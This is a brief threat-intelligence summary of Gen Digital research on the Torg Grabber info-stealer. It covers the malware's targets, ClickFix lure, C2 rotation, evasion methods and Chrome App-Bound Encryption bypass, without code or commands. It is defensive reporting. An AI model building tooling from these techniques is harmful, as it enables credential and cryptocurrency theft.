Torg Grabber is a rapidly evolving info-stealer that harvests sensitive data from 850 browser extensions — including 728 dedicated to cryptocurrency wallets — and also targets password managers, 2FA tools, note-taking apps, and desktop wallets. Gen Digital researchers found 334 unique samples compiled in three months, weekly-registered C2 domains, advanced evasion techniques, and a standalone extraction tool called Underground that abuses Chrome’s COM Elevation Service. #TorgGrabber #GenDigital
Keypoints
- Targets 850 browser extensions, with 728 focused on cryptocurrency wallets including MetaMask, Phantom, TrustWallet, and Coinbase.
- Initial access is gained via the ClickFix clipboard-hijack trick that lures users into running a malicious PowerShell command.
- Researchers recorded 334 unique Torg Grabber samples between December 2025 and February 2026 and weekly registration of new C2 domains.
- The malware employs multi-layer obfuscation, direct syscalls, reflective loading, in-memory execution, and an App-Bound Encryption (ABE) bypass to evade detection.
- Exfiltration shifted from Telegram/custom TCP to HTTPS through Cloudflare; a separate “Underground” tool extracts Chrome’s master key, and the malware can steal credentials, cookies, files, take screenshots, profile hosts, and execute ChaCha-encrypted shellcode.